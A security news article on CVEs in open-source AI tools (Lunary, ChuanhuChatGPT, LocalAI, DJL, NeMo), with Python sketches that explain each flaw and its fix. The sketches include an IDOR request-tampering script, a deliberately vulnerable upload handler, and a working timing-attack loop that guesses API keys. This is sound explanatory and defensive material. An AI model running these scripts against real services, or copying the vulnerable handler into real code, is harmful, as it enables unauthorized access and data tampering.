Researchers Identify Vulnerabilities in Open-Source AI and ML Models

Over three dozen security vulnerabilities have been found in various open-source AI and ML models, with some capable of enabling remote code execution and data theft. These flaws, discovered in tools such as ChuanhuChatGPT, Lunary, and LocalAI, were reported via Protect AI’s Huntr bug bounty platform.

The most severe of the flaws are two shortcomings impacting Lunary, a production toolkit for large language models (LLMs):

  • CVE-2024-7474 (CVSS score: 9.1) - An Insecure Direct Object Reference (IDOR) vulnerability that could allow an authenticated user to view or delete external users, resulting in unauthorized data access and potential data loss
  • CVE-2024-7475 (CVSS score: 9.1) - An improper access control vulnerability that allows an attacker to update the SAML configuration, thereby making it possible to log in as an unauthorized user and access sensitive information

Protect AI also flagged a third Lunary flaw, an IDOR vulnerability (CVE-2024-7473, CVSS 7.5), and detailed its attack scenario: an attacker logs in as User A and intercepts a request to update a prompt. By altering the 'id' parameter to the 'id' of a prompt belonging to User B, the attacker can modify User B's prompt without authorization, as the sketch below illustrates.
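
A minimal Python sketch of this request-tampering pattern, using the requests library; the endpoint, parameter names, and token are hypothetical stand-ins, not Lunary's actual API:

```python
import requests

# Hypothetical endpoint and token; illustrative only, not Lunary's real API.
BASE_URL = "https://lunary.example.com/api/v1/prompts"
USER_A_TOKEN = "session-token-for-user-a"

# User A is authenticated, but the server trusts the client-supplied 'id'
# without verifying ownership. Substituting User B's prompt id (here, 42)
# lets User A overwrite a resource they do not own: the essence of IDOR.
payload = {"id": 42, "content": "attacker-controlled prompt text"}

resp = requests.post(
    f"{BASE_URL}/update",
    json=payload,
    headers={"Authorization": f"Bearer {USER_A_TOKEN}"},
    timeout=10,
)
print(resp.status_code)  # a 200 here would confirm the missing ownership check
```

The defense is to authorize on the server side, checking that the authenticated user actually owns the object referenced by 'id' before applying the update.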

Another critical vulnerability (CVE-2024-5982, CVSS 9.1) involves a path traversal issue in ChuanhuChatGPT’s upload feature, which could lead to arbitrary code execution, unauthorized directory creation, and exposure of sensitive data.
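
Path traversal in upload handlers generally comes down to joining a user-supplied filename onto a base directory without normalizing the result. The following Python sketch is hypothetical (it is not ChuanhuChatGPT's code) and shows both the vulnerable pattern and the usual containment check:

```python
import os

UPLOAD_DIR = "/srv/app/uploads"  # hypothetical upload root

def save_upload_unsafe(filename: str, data: bytes) -> str:
    # Vulnerable: a filename like "../../etc/cron.d/job" escapes UPLOAD_DIR.
    path = os.path.join(UPLOAD_DIR, filename)
    with open(path, "wb") as f:
        f.write(data)
    return path

def save_upload_safe(filename: str, data: bytes) -> str:
    # Fix: resolve the final path and confirm it stays inside UPLOAD_DIR.
    base = os.path.realpath(UPLOAD_DIR)
    path = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, path]) != base:
        raise ValueError(f"rejected traversal attempt: {filename!r}")
    with open(path, "wb") as f:
        f.write(data)
    return path
```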

LocalAI, an open-source platform for running self-hosted LLMs, also faces two vulnerabilities. One (CVE-2024-6983, CVSS 8.8) could allow arbitrary code execution through a malicious configuration file, while another (CVE-2024-7010, CVSS 7.5) enables API key guessing via response time analysis, allowing an attacker to deduce a valid key one character at a time, as described by Protect AI.
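
The timing side channel exploits the fact that a non-constant-time, character-by-character key comparison returns slightly faster the earlier it hits a mismatch. Below is a hypothetical Python sketch of the recovery loop; the endpoint, key length, and alphabet are assumptions, not LocalAI's real interface:

```python
import string
import time

import requests

API_URL = "https://localai.example.com/v1/models"  # hypothetical endpoint
ALPHABET = string.ascii_letters + string.digits    # assumed key alphabet
KEY_LENGTH = 32                                    # assumed key length

def measure(candidate: str, samples: int = 5) -> float:
    """Average several requests to smooth out network jitter."""
    total = 0.0
    for _ in range(samples):
        start = time.perf_counter()
        requests.get(
            API_URL,
            headers={"Authorization": f"Bearer {candidate}"},
            timeout=10,
        )
        total += time.perf_counter() - start
    return total / samples

recovered = ""
while len(recovered) < KEY_LENGTH:
    # Pad each probe to full length so only the guessed character varies.
    timings = {
        c: measure(recovered + c + "A" * (KEY_LENGTH - len(recovered) - 1))
        for c in ALPHABET
    }
    # The slowest response suggests the comparison advanced one character.
    recovered += max(timings, key=timings.get)
    print("recovered so far:", recovered)
```

The standard fix is a constant-time comparison (for example, Python's hmac.compare_digest), which removes the correlation between response time and matching prefix length.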

Additionally, a remote code execution vulnerability in the Deep Java Library (DJL) (CVE-2024-8396, CVSS 7.8) is linked to an arbitrary file overwrite issue within its untar function.
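
This is a variant of the classic "tar slip" pattern, in which archive entry names containing '../' escape the extraction directory. DJL itself is Java; the Python sketch below only illustrates the general defensive check, not DJL's actual fix:

```python
import os
import tarfile

def safe_extract(archive_path: str, dest_dir: str) -> None:
    """Extract a tar archive, rejecting entries that escape dest_dir."""
    dest = os.path.realpath(dest_dir)
    with tarfile.open(archive_path) as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(dest, member.name))
            # An entry named "../../home/user/.bashrc" resolves outside
            # dest and would overwrite an arbitrary file on extraction.
            if os.path.commonpath([dest, target]) != dest:
                raise ValueError(f"blocked traversal entry: {member.name!r}")
        tar.extractall(dest)
```

On Python 3.12 and later, tarfile's built-in extraction filters (for example, extractall(path, filter="data")) enforce a similar containment check.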

The disclosure comes shortly after NVIDIA released patches for a path traversal vulnerability in its NeMo generative AI framework (CVE-2024-0129, CVSS 6.3), which could result in code execution and data tampering.

For Further Reference

https://thehackernews.com/2024/10/researchers-uncover-vulnerabilities-in.html
